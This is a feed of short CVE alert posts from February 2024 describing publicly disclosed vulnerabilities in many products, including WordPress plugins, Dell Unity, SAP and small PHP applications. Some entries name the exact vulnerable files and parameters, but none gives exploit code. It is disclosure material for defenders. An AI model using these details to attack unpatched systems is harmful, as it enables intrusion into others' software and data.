| 2024-02-13 10:37:25 |
🚨 CVE-2023-6072A cross-site scripting vulnerability in Trellix Central Management (CM) prior to 9.1.3.97129 allows a remote authenticated attacker to craft CM dashboard internal requests causing arbitrary content to be injected into the response when accessing the CM dashboard.🎖@cveNotify |
|
| 2024-02-13 10:37:24 |
🚨 CVE-2023-0076The Download Attachments WordPress plugin before 1.3 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-02-13 08:37:43 |
🚨 CVE-2023-0781A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been declared as critical. This vulnerability affects the function query of the file removeOrder.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220624.🎖@cveNotify |
|
| 2024-02-13 08:37:42 |
🚨 CVE-2023-0674A vulnerability, which was classified as problematic, has been found in XXL-JOB 2.3.1. Affected by this issue is some unknown functionality of the file /user/updatePwd of the component New Password Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220196.🎖@cveNotify |
|
| 2024-02-13 08:37:38 |
🚨 CVE-2023-0570A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. This affects an unknown part of the file user\operations\payment_operation.php. The manipulation of the argument booking_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219729 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-13 08:37:37 |
🚨 CVE-2023-0534A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. This affects an unknown part of the file admin/expense_report.php. The manipulation of the argument to_date leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219603.🎖@cveNotify |
|
| 2024-02-13 08:37:32 |
🚨 CVE-2023-0531A vulnerability classified as critical has been found in SourceCodester Online Tours & Travels Management System 1.0. Affected is an unknown function of the file admin/booking_report.php. The manipulation of the argument to_date leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219600.🎖@cveNotify |
|
| 2024-02-13 08:37:31 |
🚨 CVE-2023-0529A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/add_payment.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-219598 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-13 08:37:26 |
🚨 CVE-2023-0515A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0 and classified as critical. This issue affects some unknown processing of the file admin/forget_password.php of the component Parameter Handler. The manipulation of the argument email leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219335.🎖@cveNotify |
|
| 2024-02-13 08:37:25 |
🚨 CVE-2023-0125A vulnerability was found in Control iD Gerencia Web 1.30. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Web Interface. The manipulation of the argument Nome leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-217717 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-13 07:37:25 |
🚨 CVE-2023-6815Incorrect Privilege Assignment vulnerability in Mitsubishi Electric Corporation MELSEC iQ-R Series Safety CPU R08/16/32/120SFCPU all versions and MELSEC iQ-R Series SIL2 Process CPU R08/16/32/120PSFCPU all versions allows a remote authenticated attacker who has logged into the product as a non-administrator user to disclose the credentials (user ID and password) of a user with a lower access level than the attacker by sending a specially crafted packet.🎖@cveNotify |
|
| 2024-02-13 07:37:24 |
🚨 CVE-2024-22851Directory Traversal Vulnerability in LiveConfig before v.2.5.2 allows a remote attacker to obtain sensitive information via a crafted request to the /static/ endpoint.🎖@cveNotify |
|
| 2024-02-13 05:37:25 |
🚨 CVE-2024-21491Versions of the package svix before 1.17.0 are vulnerable to Authentication Bypass due to an issue in the verify function where signatures of different lengths are incorrectly compared. An attacker can bypass signature verification by providing a shorter signature that matches the beginning of the actual signature.**Note:**The attacker would need to know a victim uses the Rust library for verification,no easy way to automatically check that; and uses webhooks by a service that uses Svix, and then figure out a way to craft a malicious payload that will actually include all of the correct identifiers needed to trick the receivers to cause actual issues.🎖@cveNotify |
|
| 2024-02-13 05:37:24 |
🚨 CVE-2022-48623The Cpanel::JSON::XS package before 4.33 for Perl performs out-of-bounds accesses in a way that allows attackers to obtain sensitive information or cause a denial of service.🎖@cveNotify |
|
| 2024-02-13 04:37:24 |
🚨 CVE-2024-22024An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication.🎖@cveNotify |
|
| 2024-02-13 03:37:32 |
🚨 CVE-2024-24739SAP Bank Account Management (BAM) allows an authenticated user with restricted access to use functions which can result in escalation of privileges with low impact on confidentiality, integrity and availability of the application.🎖@cveNotify |
|
| 2024-02-13 03:37:25 |
🚨 CVE-2024-22130Print preview option in SAP CRM WebClient UI - versions S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, S4FND 108, WEBCUIF 700, WEBCUIF 701, WEBCUIF 730, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability. An attacker with low privileges can cause limited impact to confidentiality and integrity of the appliaction data after successful exploitation.🎖@cveNotify |
|
| 2024-02-13 03:37:24 |
🚨 CVE-2023-47218An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.5.2645 build 20240116 and laterQuTS hero h5.1.5.2647 build 20240118 and laterQuTScloud c5.1.5.2651 and later🎖@cveNotify |
|
| 2024-02-13 02:37:25 |
🚨 CVE-2024-22126The User Admin application of SAP NetWeaver AS for Java - version 7.50, insufficiently validates and improperly encodes the incoming URL parameters before including them into the redirect URL. This results in Cross-Site Scripting (XSS) vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.🎖@cveNotify |
|
| 2024-02-13 02:37:24 |
🚨 CVE-2024-20290A vulnerability in the OLE2 file format parser of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to an incorrect check for end-of-string values during scanning, which may result in a heap buffer over-read. An attacker could exploit this vulnerability by submitting a crafted file containing OLE2 content to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to terminate, resulting in a DoS condition on the affected software and consuming available system resources. For a description of this vulnerability, see the ClamAV blog .🎖@cveNotify |
|
| 2024-02-13 02:07:24 |
🚨 CVE-2023-43770Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3 allows XSS via text/plain e-mail messages with crafted links because of program/lib/Roundcube/rcube_string_replacer.php behavior.🎖@cveNotify |
|
| 2024-02-13 01:37:30 |
🚨 CVE-2023-52059A cross-site scripting (XSS) vulnerability in Gestsup v3.2.46 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description text field.🎖@cveNotify |
|
| 2024-02-13 01:37:25 |
🚨 CVE-2023-47623Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login.🎖@cveNotify |
|
| 2024-02-13 01:37:24 |
🚨 CVE-2023-37611Cross Site Scripting (XSS) vulnerability in Neos CMS 8.3.3 allows a remote authenticated attacker to execute arbitrary code via a crafted SVG file to the neos/management/media component.🎖@cveNotify |
|
| 2024-02-13 01:07:32 |
🚨 CVE-2024-0853curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (*OCSP stapling*) test failed. A subsequent transfer tothe same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check.🎖@cveNotify |
|
| 2024-02-13 01:07:25 |
🚨 CVE-2024-23550HCL DevOps Deploy / HCL Launch (UCD) could disclose sensitive user information when installing the Windows agent.🎖@cveNotify |
|
| 2024-02-13 01:07:24 |
🚨 CVE-2024-22290Cross-Site Request Forgery (CSRF) vulnerability in AboZain,O7abeeb,UnitOne Custom Dashboard Widgets allows Cross-Site Scripting (XSS).This issue affects Custom Dashboard Widgets: from n/a through 1.3.1.🎖@cveNotify |
|
| 2024-02-13 00:37:25 |
🚨 CVE-2023-7216A path traversal vulnerability was found in the CPIO utility. This issue could allow a remote unauthenticated attacker to trick a user into opening a specially crafted archive. During the extraction process, the archiver could follow symlinks outside of the intended directory, which could be utilized to run arbitrary commands on the target system.🎖@cveNotify |
|
| 2024-02-13 00:37:24 |
🚨 CVE-2023-52138Engrampa is an archive manager for the MATE environment. Engrampa is found to be vulnerable to a Path Traversal vulnerability that can be leveraged to achieve full Remote Command Execution (RCE) on the target. While handling CPIO archives, the Engrampa Archive manager follows symlink, cpio by default will follow stored symlinks while extracting and the Archiver will not check the symlink location, which leads to arbitrary file writes to unintended locations. When the victim extracts the archive, the attacker can craft a malicious cpio or ISO archive to achieve RCE on the target system. This vulnerability was fixed in commit 63d5dfa.🎖@cveNotify |
|
| 2024-02-12 23:37:26 |
🚨 CVE-2024-25112Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A denial-of-service was found in Exiv2 version v0.28.1: an unbounded recursion can cause Exiv2 to crash by exhausting the stack. The vulnerable function, `QuickTimeVideo::multipleEntriesDecoder`, was new in v0.28.0, so Exiv2 versions before v0.28 are _not_ affected. The denial-of-service is triggered when Exiv2 is used to read the metadata of a crafted video file. This bug is fixed in version v0.28.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-12 23:37:25 |
🚨 CVE-2023-52430The caddy-security plugin 1.1.20 for Caddy allows reflected XSS via a GET request to a URL that contains an XSS payload and begins with either a /admin or /settings/mfa/delete/ substring.🎖@cveNotify |
|
| 2024-02-12 23:37:24 |
🚨 CVE-2023-28018HCL Connections is vulnerable to a denial of service, caused by improper validation on certain requests. Using a specially-crafted request an attacker could exploit this vulnerability to cause denial of service for affected users.🎖@cveNotify |
|
| 2024-02-12 22:37:32 |
🚨 CVE-2024-23763SQL Injection vulnerability in Gambio through 4.9.2.0 allows attackers to run arbitrary SQL commands via crafted GET request using modifiers[attribute][] parameter.🎖@cveNotify |
|
| 2024-02-12 22:37:25 |
🚨 CVE-2024-23760Cleartext Storage of Sensitive Information in Gambio 4.9.2.0 allows attackers to obtain sensitive information via error-handler.log.json and legacy-error-handler.log.txt under the webroot.🎖@cveNotify |
|
| 2024-02-12 22:37:24 |
🚨 CVE-2024-0685The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Second Order SQL Injection via the email address value submitted through forms in all versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to inject SQL in their email address that will append additional into the already existing query when an administrator triggers a personal data export.🎖@cveNotify |
|
| 2024-02-12 22:07:32 |
🚨 CVE-2024-25318Code-projects Hotel Managment System 1.0 allows SQL Injection via the 'pid' parameter in Hotel/admin/print.php?pid=2.🎖@cveNotify |
|
| 2024-02-12 22:07:25 |
🚨 CVE-2024-24559Vyper is a Pythonic Smart Contract Language for the EVM. There is an error in the stack management when compiling the `IR` for `sha3_64`. Concretely, the `height` variable is miscalculated. The vulnerability can't be triggered without writing the `IR` by hand (that is, it cannot be triggered from regular vyper code). `sha3_64` is used for retrieval in mappings. No flow that would cache the `key` was found so the issue shouldn't be possible to trigger when compiling the compiler-generated `IR`. This issue isn't triggered during normal compilation of vyper code so the impact is low. At the time of publication there is no patch available.🎖@cveNotify |
|
| 2024-02-12 22:07:24 |
🚨 CVE-2024-22208phpMyFAQ is an Open Source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. The 'sharing FAQ' functionality allows any unauthenticated actor to misuse the phpMyFAQ application to send arbitrary emails to a large range of targets. The phpMyFAQ application has a functionality where anyone can share a FAQ item to others. The front-end of this functionality allows any phpMyFAQ articles to be shared with 5 email addresses. Any unauthenticated actor can perform this action. There is a CAPTCHA in place, however the amount of people you email with a single request is not limited to 5 by the backend. An attacker can thus solve a single CAPTCHA and send thousands of emails at once. An attacker can utilize the target application's email server to send phishing messages. This can get the server on a blacklist, causing all emails to end up in spam. It can also lead to reputation damages. This issue has been patched in version 3.2.5.🎖@cveNotify |
|
| 2024-02-12 21:37:25 |
🚨 CVE-2024-1459A path traversal vulnerability was found in Undertow. This issue may allow a remote attacker to append a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP, which may permit access to privileged or restricted files and directories.🎖@cveNotify |
|
| 2024-02-12 21:37:24 |
🚨 CVE-2023-32474Dell Display Manager application, version 2.1.1.17 and prior, contain an insecure operation on windows junction/mount point. A local malicious user could potentially exploit this vulnerability during installation leading to arbitrary folder or file deletion🎖@cveNotify |
|
| 2024-02-12 21:07:44 |
🚨 CVE-2024-22221Dell Unity, versions prior to 5.4, contains SQL Injection vulnerability. An authenticated attacker could potentially exploit this vulnerability, leading to exposure of sensitive information.🎖@cveNotify |
|
| 2024-02-12 21:07:37 |
🚨 CVE-2024-0167Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in the svc_topstats utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability to overwrite arbitrary files on the file system with root privileges.🎖@cveNotify |
|
| 2024-02-12 21:07:36 |
🚨 CVE-2024-0166Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_tcpdump utility. An authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands with elevated privileges.🎖@cveNotify |
|
| 2024-02-12 21:07:32 |
🚨 CVE-2024-0165Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_acldb_dump utility. An authenticated attacker could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges.🎖@cveNotify |
|
| 2024-02-12 21:07:31 |
🚨 CVE-2022-38714IBM DataStage on Cloud Pak for Data 4.0.6 to 4.5.2 stores sensitive credential information that can be read by a privileged user. IBM X-Force ID: 235060.🎖@cveNotify |
|
| 2024-02-12 21:07:26 |
🚨 CVE-2024-0254The (Simply) Guest Author Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post meta in all versions up to, and including, 4.34 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-12 21:07:25 |
🚨 CVE-2023-34042The spring-security.xsd file inside the spring-security-config jar is world writable which means that if it were extracted it could be written by anyone with access to the file system.While there are no known exploits, this is an example of “CWE-732: Incorrect Permission Assignment for Critical Resource” and could result in an exploit. Users should update to the latest version of Spring Security to mitigate any future exploits found around this issue.🎖@cveNotify |
|
| 2024-02-12 20:37:25 |
🚨 CVE-2022-22506IBM Robotic Process Automation 21.0.2 contains a vulnerability that could allow user ids may be exposed across tenants. IBM X-Force ID: 227293.🎖@cveNotify |
|
| 2024-02-12 20:37:24 |
🚨 CVE-2021-4437A vulnerability, which was classified as problematic, has been found in dbartholomae lambda-middleware frameguard up to 1.0.4. Affected by this issue is some unknown functionality of the file packages/json-deserializer/src/JsonDeserializer.ts of the component JSON Mime-Type Handler. The manipulation leads to inefficient regular expression complexity. Upgrading to version 1.1.0 is able to address this issue. The patch is identified as f689404d830cbc1edd6a1018d3334ff5f44dc6a6. It is recommended to upgrade the affected component. VDB-253406 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-12 20:07:25 |
🚨 CVE-2023-33851IBM PowerVM Hypervisor FW950.00 through FW950.90, FW1020.00 through FW1020.40, and FW1030.00 through FW1030.30 could reveal sensitive partition data to a system administrator. IBM X-Force ID: 257135.🎖@cveNotify |
|
| 2024-02-12 20:07:24 |
🚨 CVE-2021-32677FastAPI is a web framework for building APIs with Python 3.6+ based on standard Python type hints. FastAPI versions lower than 0.65.2 that used cookies for authentication in path operations that received JSON payloads sent by browsers were vulnerable to a Cross-Site Request Forgery (CSRF) attack. In versions lower than 0.65.2, FastAPI would try to read the request payload as JSON even if the content-type header sent was not set to application/json or a compatible JSON media type (e.g. application/geo+json). A request with a content type of text/plain containing JSON data would be accepted and the JSON data would be extracted. Requests with content type text/plain are exempt from CORS preflights, for being considered Simple requests. The browser will execute them right away including cookies, and the text content could be a JSON string that would be parsed and accepted by the FastAPI application. This is fixed in FastAPI 0.65.2. The request data is now parsed as JSON only if the content-type header is application/json or another JSON compatible media type like application/geo+json. It's best to upgrade to the latest FastAPI, but if updating is not possible then a middleware or a dependency that checks the content-type header and aborts the request if it is not application/json or another JSON compatible content type can act as a mitigating workaround.🎖@cveNotify |
|
| 2024-02-12 19:37:43 |
🚨 CVE-2024-22228Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_cifssupport utility. An authenticated attacker could potentially exploit this vulnerability, escaping the restricted shell and execute arbitrary operating system commands with root privileges.🎖@cveNotify |
|
| 2024-02-12 19:37:42 |
🚨 CVE-2024-22225Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_supportassist utility. An authenticated attacker could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges.🎖@cveNotify |
|
| 2024-02-12 19:37:37 |
🚨 CVE-2024-22223Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability within its svc_cbr utility. An authenticated malicious user with local access could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application.🎖@cveNotify |
|
| 2024-02-12 19:37:36 |
🚨 CVE-2024-0170Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_cava utility. An authenticated attacker could potentially exploit this vulnerability, escaping the restricted shell and execute arbitrary operating system commands with root privileges.🎖@cveNotify |
|
| 2024-02-12 19:37:31 |
🚨 CVE-2024-0168Dell Unity, versions prior to 5.4, contains a Command Injection Vulnerability in svc_oscheck utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability to inject arbitrary operating system commands. This vulnerability allows an authenticated attacker to execute commands with root privileges.🎖@cveNotify |
|
| 2024-02-12 19:37:30 |
🚨 CVE-2024-0165Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_acldb_dump utility. An authenticated attacker could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges.🎖@cveNotify |
|
| 2024-02-12 19:37:26 |
🚨 CVE-2024-0164Dell Unity, versions prior to 5.4, contain an OS Command Injection Vulnerability in its svc_topstats utility. An authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary commands with elevated privileges.🎖@cveNotify |
|
| 2024-02-12 19:37:25 |
🚨 CVE-2022-34311IBM CICS TX Standard and Advanced 11.1 could allow a user with physical access to the web browser to gain access to the user's session due to insufficiently protected credentials. IBM X-Force ID: 229446.🎖@cveNotify |
|
| 2024-02-12 19:07:25 |
🚨 CVE-2024-1064A host header injection vulnerability in the HTTP handler component of Crafty Controller allows a remote, unauthenticated attacker to trigger a Denial of Service (DoS) condition via a modified host header🎖@cveNotify |
|
| 2024-02-12 19:07:24 |
🚨 CVE-2023-6780An integer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when these functions are called with a very long message, leading to an incorrect calculation of the buffer size to store the message, resulting in undefined behavior. This issue affects glibc 2.37 and newer.🎖@cveNotify |
|
| 2024-02-12 18:37:24 |
🚨 CVE-2022-34310IBM CICS TX Standard and Advanced 11.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 229441.🎖@cveNotify |
|
| 2024-02-12 18:07:25 |
🚨 CVE-2024-24482Aprktool before 2.9.3 on Windows allows ../ and /.. directory traversal.🎖@cveNotify |
|
| 2024-02-12 17:37:44 |
🚨 CVE-2023-7233The GigPress WordPress plugin through 2.3.29 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-02-12 17:37:43 |
🚨 CVE-2023-6501The Splashscreen WordPress plugin through 0.20 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-02-12 17:37:42 |
🚨 CVE-2023-6294The Popup Builder WordPress plugin before 4.2.6 does not validate a parameter before making a request to it, which could allow users with the administrator role to perform SSRF attack in Multisite WordPress configurations.🎖@cveNotify |
|
| 2024-02-12 17:37:38 |
🚨 CVE-2023-6082The chartjs WordPress plugin through 2023.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-02-12 17:37:37 |
🚨 CVE-2023-6036The Web3 WordPress plugin before 3.0.0 is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.🎖@cveNotify |
|
| 2024-02-12 17:37:36 |
🚨 CVE-2024-24112xmall v1.1 was discovered to contain a SQL injection vulnerability via the orderDir parameter.🎖@cveNotify |
|
| 2024-02-12 17:37:32 |
🚨 CVE-2024-23049An issue in symphony v.3.6.3 and before allows a remote attacker to execute arbitrary code via the log4j component.🎖@cveNotify |
|
| 2024-02-12 17:37:31 |
🚨 CVE-2024-24259freeglut through 3.4.0 was discovered to contain a memory leak via the menuEntry variable in the glutAddMenuEntry function.🎖@cveNotify |
|
| 2024-02-12 17:37:30 |
🚨 CVE-2024-1225A vulnerability classified as critical was found in QiboSoft QiboCMS X1 up to 1.0.6. Affected by this vulnerability is the function rmb_pay of the file /application/index/controller/Pay.php. The manipulation of the argument callback_class leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252847. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-12 17:37:26 |
🚨 CVE-2024-1199A vulnerability has been found in CodeAstro Employee Task Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file \employee-tasks-php\attendance-info.php. The manipulation of the argument aten_id leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252697 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-12 17:37:25 |
🚨 CVE-2024-1198A vulnerability, which was classified as critical, was found in openBI up to 6.0.3. Affected is the function addxinzhi of the file application/controllers/User.php of the component Phar Handler. The manipulation of the argument outimgurl leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252696.🎖@cveNotify |
|
| 2024-02-12 17:07:32 |
🚨 CVE-2023-45227An attacker with access to the web application with vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the "dns.0.server" parameter.🎖@cveNotify |
|
| 2024-02-12 17:07:31 |
🚨 CVE-2023-45222An attacker with access to the web application that has the vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the "autorefresh" parameter.🎖@cveNotify |
|
| 2024-02-12 17:07:27 |
🚨 CVE-2023-42765An attacker with access to the vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the "username" parameter in the SNMP configuration.🎖@cveNotify |
|
| 2024-02-12 17:07:26 |
🚨 CVE-2023-37528A cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform can possibly allow an attack to exploit an application parameter during execution of the Save Report.🎖@cveNotify |
|
| 2024-02-12 16:37:32 |
🚨 CVE-2023-6501The Splashscreen WordPress plugin through 0.20 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-02-12 16:37:25 |
🚨 CVE-2023-6082The chartjs WordPress plugin through 2023.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-02-12 16:37:24 |
🚨 CVE-2023-6036The Web3 WordPress plugin before 3.0.0 is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.🎖@cveNotify |
|
| 2024-02-12 16:07:24 |
🚨 CVE-2023-4637The WPvivid plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the restore() and get_restore_progress() function in versions up to, and including, 0.9.94. This makes it possible for unauthenticated attackers to invoke these functions and obtain full file paths if they have access to a back-up ID.🎖@cveNotify |
|
| 2024-02-12 14:37:45 |
🚨 CVE-2024-25307Code-projects Cinema Seat Reservation System 1.0 allows SQL Injection via the 'id' parameter at "/Cinema-Reservation/booking.php?id=1."🎖@cveNotify |
|
| 2024-02-12 14:37:44 |
🚨 CVE-2024-25302Sourcecodester Event Student Attendance System 1.0, allows SQL Injection via the 'student' parameter.🎖@cveNotify |
|
| 2024-02-12 14:37:43 |
🚨 CVE-2024-25312Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'id' parameter at "School/sub_delete.php?id=5."🎖@cveNotify |
|
| 2024-02-12 14:37:38 |
🚨 CVE-2024-25308Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'name' parameter at School/teacher_login.php.🎖@cveNotify |
|
| 2024-02-12 14:37:37 |
🚨 CVE-2024-25304Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'apass' parameter at "School/index.php."🎖@cveNotify |
|
| 2024-02-12 14:37:32 |
🚨 CVE-2024-24499SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtfullname and txtphone parameters in the edit_profile.php component.🎖@cveNotify |
|
| 2024-02-12 14:37:31 |
🚨 CVE-2024-24497SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtusername and txtpassword parameters in the login.php components.🎖@cveNotify |
|
| 2024-02-12 14:37:26 |
🚨 CVE-2024-24131SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.🎖@cveNotify |
|
| 2024-02-12 14:37:25 |
🚨 CVE-2023-50962IBM PowerSC 1.3, 2.0, and 2.1 MFA does not implement the "HTTP Strict Transport Security" (HSTS) web security policy mechanism. IBM X-Force ID: 276004.🎖@cveNotify |
|
| 2024-02-12 13:37:25 |
🚨 CVE-2024-1062A heap overflow flaw was found in 389-ds-base. This issue leads to a denial of service when writing a value larger than 256 chars in log_entry_attr.🎖@cveNotify |
|
| 2024-02-12 13:37:24 |
🚨 CVE-2019-2392A user authorized to perform database queries may trigger denial of service by issuing specially crafted queries, which use the $mod operator to overflow negative values. This issue affects: MongoDB Inc. MongoDB Server v4.4 versions prior to 4.4.1; v4.2 versions prior to 4.2.9; v4.0 versions prior to 4.0.20; v3.6 versions prior to 3.6.20.🎖@cveNotify |
|
| 2024-02-12 11:37:24 |
🚨 CVE-2024-1439Inadequate access control in Moodle LMS. This vulnerability could allow a local user with a student role to create arbitrary events intended for users with higher roles. It could also allow the attacker to add events to the calendar of all users without their prior consent.🎖@cveNotify |
|
| 2024-02-12 10:37:24 |
🚨 CVE-2023-5824Squid is vulnerable to Denial of Service attack against HTTP and HTTPS clients due to an Improper Handling of Structural Elements bug.🎖@cveNotify |
|
| 2024-02-12 09:37:32 |
🚨 CVE-2023-41708References to the "app loader" functionality could contain redirects to unexpected locations. Attackers could forge app references that bypass existing safeguards to inject malicious script code. Please deploy the provided updates and patch releases. References to apps are now controlled more strict to avoid relative references. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-02-12 09:37:25 |
🚨 CVE-2023-41704Processing of CID references at E-Mail can be abused to inject malicious script code that passes the sanitization engine. Malicious script code could be injected to a users sessions when interacting with E-Mails. Please deploy the provided updates and patch releases. CID handing has been improved and resulting content is checked for malicious content. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-02-12 09:37:24 |
🚨 CVE-2023-41703User ID references at mentions in document comments were not correctly sanitized. Script code could be injected to a users session when working with a malicious document. Please deploy the provided updates and patch releases. User-defined content like comments and mentions are now filtered to avoid potentially malicious content. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-02-12 08:37:25 |
🚨 CVE-2024-24797Deserialization of Untrusted Data vulnerability in G5Theme ERE Recently Viewed – Essential Real Estate Add-On.This issue affects ERE Recently Viewed – Essential Real Estate Add-On: from n/a through 1.3.🎖@cveNotify |
|
| 2024-02-12 08:37:24 |
🚨 CVE-2024-23513Deserialization of Untrusted Data vulnerability in PropertyHive.This issue affects PropertyHive: from n/a through 2.0.5.🎖@cveNotify |
|
| 2024-02-12 07:37:32 |
🚨 CVE-2024-25100Deserialization of Untrusted Data vulnerability in WP Swings Coupon Referral Program.This issue affects Coupon Referral Program: from n/a through 1.7.2.🎖@cveNotify |
|
| 2024-02-12 07:37:26 |
🚨 CVE-2024-24889Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Geek Code Lab All 404 Pages Redirect to Homepage allows Stored XSS.This issue affects All 404 Pages Redirect to Homepage: from n/a through 1.9.🎖@cveNotify |
|
| 2024-02-12 07:37:25 |
